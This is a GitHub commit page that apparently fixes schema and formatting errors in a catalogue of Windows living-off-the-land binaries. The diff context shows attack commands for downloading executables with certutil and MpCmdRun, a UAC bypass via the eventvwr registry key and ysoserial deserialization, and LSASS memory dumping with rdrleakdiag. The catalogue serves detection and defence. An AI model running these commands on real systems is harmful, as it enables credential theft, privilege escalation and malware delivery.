Skip to content

Commit 6a47516

Browse files
committed
Fixing YML schema errors
1 parent 2814344 commit 6a47516

File tree

12 files changed

+16
-26
lines changed

12 files changed

+16
-26
lines changed

.github/workflows/validation.py

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -104,11 +104,11 @@ class MainModel(BaseModel):
104104
# GitHub Actions error format
105105
path = '.'.join([str(x) for x in err.get('loc', [None])])
106106
msg = err.get('msg', 'Unknown validation error')
107-
print(f"::error file={file_path},line=1,col=1::'{msg}' for {path}")
107+
print(f"::error file={file_path},line=1,title=Schema error::'{msg}' for {path}")
108108
has_errors = True
109109
except Exception as e:
110110
print(f"⚠️ Error processing {file_path}: {e}\n")
111-
print(f"::error file={file_path},line=1,col=1::Error processing file: {e}")
111+
print(f"::error file={file_path},line=1,title=Processing error::Error processing file: {e}")
112112
has_errors = True
113113

114114
sys.exit(-1 if has_errors else 0)

yml/OSBinaries/Bitsadmin.yml

Lines changed: 0 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -35,8 +35,6 @@ Commands:
3535
Full_Path:
3636
- Path: C:\Windows\System32\bitsadmin.exe
3737
- Path: C:\Windows\SysWOW64\bitsadmin.exe
38-
Code_Sample:
39-
- Code:
4038
Detection:
4139
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml
4240
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml

yml/OSBinaries/Certutil.yml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -12,7 +12,7 @@ Commands:
1212
MitreID: T1105
1313
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
1414
- Command: certutil.exe -verifyctl -f {REMOTEURL:.exe} {PATH:.exe}
15-
Description: Download and save an executable to disk in the current folder when a file path is specified, or %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\[hash] when not.
15+
Description: Download and save an executable to disk in the current folder when a file path is specified, or `%LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\{hash}` when not.
1616
Usecase: Download file from Internet
1717
Category: Download
1818
Privileges: User
@@ -26,7 +26,7 @@ Commands:
2626
MitreID: T1564.004
2727
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
2828
- Command: certutil.exe -URL {REMOTEURL:.exe}
29-
Description: Download and save an executable to %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\[hash].
29+
Description: Download and save an executable to `%LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\{hash}`.
3030
Usecase: Download file from Internet
3131
Category: Download
3232
Privileges: User

yml/OSBinaries/Cmdkey.yml

Lines changed: 0 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -19,6 +19,3 @@ Detection:
1919
Resources:
2020
- Link: https://web.archive.org/web/20230202122017/https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
2121
- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
22-
Acknowledgement:
23-
- Person:
24-
Handle:

yml/OSBinaries/Eudcedit.yml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -5,7 +5,7 @@ Author: Matan Bahar
55
Created: 2025-08-07
66
Commands:
77
- Command: eudcedit
8-
Description: Once executed, the Private Charecter Editor will be opened - click OK, then click File -> Font Links. In the next window choose the option "Link with Selected Fonts" and click on Save As, then in the opened enter the command you want to execute.
8+
Description: Once executed, the Private Charecter Editor will be opened - click OK, then click File -> Font Links. In the next window choose the option "Link with Selected Fonts" and click on Save As, then in the opened enter the command you want to execute.
99
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
1010
Category: UAC Bypass
1111
Privileges: Administrator

yml/OSBinaries/Eventvwr.yml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -5,7 +5,7 @@ Author: Jacob Gajek
55
Created: 2018-11-01
66
Commands:
77
- Command: eventvwr.exe
8-
Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
8+
Description: During startup, eventvwr.exe checks the registry value `HKCU\Software\Classes\mscfile\shell\open\command` for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
99
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
1010
Category: UAC Bypass
1111
Privileges: User
@@ -15,7 +15,7 @@ Commands:
1515
- Application: GUI
1616
- Execute: EXE
1717
- Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c "{CMD}" > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
18-
Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
18+
Description: During startup, eventvwr.exe uses .NET deserialization with `%LOCALAPPDATA%\Microsoft\EventV~1\RecentViews` file. This file can be created using https://github.com/pwntester/ysoserial.net
1919
Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
2020
Category: UAC Bypass
2121
Privileges: Administrator

yml/OSBinaries/Ldifde.yml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -5,7 +5,7 @@ Author: Grzegorz Tworek
55
Created: 2022-08-31
66
Commands:
77
- Command: Ldifde -i -f {PATH:.ldf}
8-
Description: Import specified .ldf file into LDAP. If the file contains http-based attrval-spec such as thumbnailPhoto:< http://example.org/somefile.txt, the file will be downloaded into IE temp folder.
8+
Description: Import specified .ldf file into LDAP. If the file contains http-based attrval-spec such as `thumbnailPhoto:< http://example.org/somefile.txt`, the file will be downloaded into IE temp folder.
99
Usecase: Download file from Internet
1010
Category: Download
1111
Privileges: Administrator

yml/OSBinaries/MpCmdRun.yml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -12,7 +12,7 @@ Commands:
1212
MitreID: T1105
1313
OperatingSystem: Windows 10
1414
- Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url {REMOTEURL:.exe} -path C:\Users\Public\Downloads\evil.exe
15-
Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) [updated version to bypass Windows 10 mitigation]
15+
Description: Download file to specified path. Slashes work as well as dashes (/DownloadFile, /url, /path). Updated version to bypass Windows 10 mitigation.
1616
Usecase: Download file
1717
Category: Download
1818
Privileges: User

yml/OSBinaries/OneDriveStandaloneUpdater.yml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -5,7 +5,7 @@ Author: 'Elliot Killick'
55
Created: 2021-08-22
66
Commands:
77
- Command: OneDriveStandaloneUpdater
8-
Description: Download a file from the web address specified in HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC. ODSUUpdateXMLUrlFromOC and UpdateXMLUrlFromOC must be equal to non-empty string values in that same registry key. UpdateOfficeConfigTimestamp is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in %localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json
8+
Description: Download a file from the web address specified in `HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC`. `ODSUUpdateXMLUrlFromOC` and `UpdateXMLUrlFromOC` must be equal to non-empty string values in that same registry key. `UpdateOfficeConfigTimestamp` is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in `%localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json`.
99
Usecase: Download a file from the Internet without executing any anomalous executables with suspicious arguments
1010
Category: Download
1111
Privileges: User

yml/OSBinaries/Rdrleakdiag.yml

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -5,21 +5,21 @@ Author: 'John Dwyer'
55
Created: 2022-05-18
66
Commands:
77
- Command: rdrleakdiag.exe /p 940 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1
8-
Description: Dump process by PID and create a dump file (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
8+
Description: Dump process by PID and create a dump file (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).
99
Usecase: Dump process by PID.
1010
Category: Dump
1111
Privileges: User
1212
MitreID: T1003
1313
OperatingSystem: Windows
1414
- Command: rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1
15-
Description: Dump LSASS process by PID and create a dump file (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
15+
Description: Dump LSASS process by PID and create a dump file (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).
1616
Usecase: Dump LSASS process.
1717
Category: Dump
1818
Privileges: Administrator
1919
MitreID: T1003.001
2020
OperatingSystem: Windows
2121
- Command: rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /snap
22-
Description: After dumping a process using /wait 1, subsequent dumps must use /snap (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
22+
Description: After dumping a process using `/wait 1`, subsequent dumps must use `/snap` (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).
2323
Usecase: Dump LSASS process mutliple times.
2424
Category: Dump
2525
Privileges: Administrator

0 commit comments

Comments
 (0)